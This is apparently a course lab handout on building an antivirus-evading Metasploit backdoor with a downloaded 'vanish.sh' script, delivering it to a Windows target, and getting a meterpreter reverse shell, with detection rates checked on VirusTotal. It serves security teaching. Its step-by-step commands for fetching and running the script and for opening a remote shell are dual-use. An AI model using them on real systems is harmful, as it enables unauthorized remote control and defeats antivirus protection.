Project 7x: Bypassing Antivirus Part 2 (10 pts.)

What You Need

A Kali Linux machine, real or virtual.
A Windows Target on the Same Network

WARNING

This is a real dangerous attack that grants you full control over the target's computer.

Don't do it without the target's permission--that's a crime!

Purpose

In the previous project, you made a file invisible to antivirus, but the file also ends up using too much RAM so it won't run on a Windows target.

This time we'll use a script that adjusts the file and recompiles it to fix that problem..

Installing the MinGW Development Environment

MinGW lets you develop Windows executables with Linux. It's used here to recompile the payload to make it smaller.

In Kali, in a Terminal window, execute these commands:

apt-get update
apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

Downloading the vanish.sh Script

In Kali, in a Terminal window, execute these commands:

wget https://samsclass.info/120/proj/vanish.sh --no-check-certificate
ll van* (Note that the second command is two lowercase L characters, not the number 11.)

You should see the vanish.sh file, as shown below:

In Kali, in a Terminal window, execute these commands to change the permissions on the script, move it to the correct folder, and run it:

chmod a+x vanish.sh mv vanish.sh /pentest/exploits/framework cd /pentest/exploits/framework
./vanish.sh

The script launches, as shown below:

At the "Which Interface to use ?" prompt, type the name of the interface that connects to your target, probably eth0 and press Enter.

At the "What Port Number are we gonna listen to?" prompt, type 4444 and press Enter.

At The "Please Enter A Random Seed Number 1-10000, The Larger The Number The Larger The Resulting Executable :" Prompt, type 1122 (or any other number) and press Enter.

At The "How many times you want to encode ? 1-20 :" Prompt, type 1 and press Enter.

Wait while the script runs. Messages about "shikata_ga_nai" and other encoders scroll by, as shown below:

When the script is done, it will launch a payload handler, as shown below:

Moving the Trojan to the Target

In the Kali machine, open another Terminal window and execute this command:

mv /pentest/exploits/framework/seclabs/backdoor.exe /root/Desktop

Minimize all Windows and look at the Kali desktop. You should see the backdoor.exe file, as shown below:

Drag the backdoor.exe file out of the virtual machine and drop it on the host machine's desktop.

Drag the backdoor.exe file from the host machine's desktop and drop it on the Windows target virtual machine's desktop.

If you are not using VMware, or if the drag-and-drop fails, you can move the file another way, such as via e-mail or a USB stick.

Viewing the Payload Handler

On the Kali machine, restore the Terminal window showing the payload handler so you can see the messages that will be created when you take control of the target.

Running the Trojan

On the Windows target, double-click the backdoor.exe file.

You should see a session open, and a "meterpreter>" prompt, as shown below:

Opening a Shell

On the Kali machine, at the "meterpreter>" prompt, type this command, and then press Enter:

shell

You should see a banner identifying the target as "Microsoft Windows", as shown below:

Saving the Screen Image

Make sure the "Microsoft Windows" banner is visible, as shown above.

Save a screen capture with a filename of "Proj 7xa from YOUR NAME".

Analyzing the Backdoor with VirusTotal

In Kali, click Applications, Internet, "Firefox Web Browser".

In Firefox, go to https://www.virustotal.com/

Click the "Choose File" button. Navigate to Desktop and double-click backdoor.exe

In the VirusTotal web page, click the "Scan It!" button.

If you see a "File already analyzed" message, click the "View last analysis" button.

The analysis shows that some of the antivirus engines detected the file--14 out of 41, when I did it, as shown below. You may see different numbers, but some of the engines should detect it.

Saving the Screen Image

Make sure the result is visible, showing something like "Detection rate: 14/41", as shown above.

Save a screen capture with a filename of "Proj 7xb from YOUR NAME".

Turning In Your Project

Email the images to cnit.120@gmail.com with a subject of "Project 7x from YOUR NAME".

Trying Other Values

I heard from Keith Burton that this script really fooled all antiviruses except AVG, so I decided to try some more parameters.

With a different seed, port, and 8 iterations, I still got detected by 13/42 AV engines.

I even modified the script to use each encoder a different number of times, as shown below, and it was still detected by 12/42 AV scanners.

That's how things are supposed to work; the AV vendors are catching on.

Sources

Thanks to Keith Burton who showed me this attack and helped me understand it.

http://www.damballa.com/downloads/r_pubs/WP_SerialVariantEvasionTactics.pdf

http://synjunkie.blogspot.com/2008/10/metasploit-payloads-msfpayload.html

http://carnal0wnage.attackresearch.com/2010/03/msfencode-msfpayload-into-existing.html

http://www.securitylabs.in/2011/12/easy-bypass-av-and-firewall.html

Last modified: 12-9-14 12:29 pm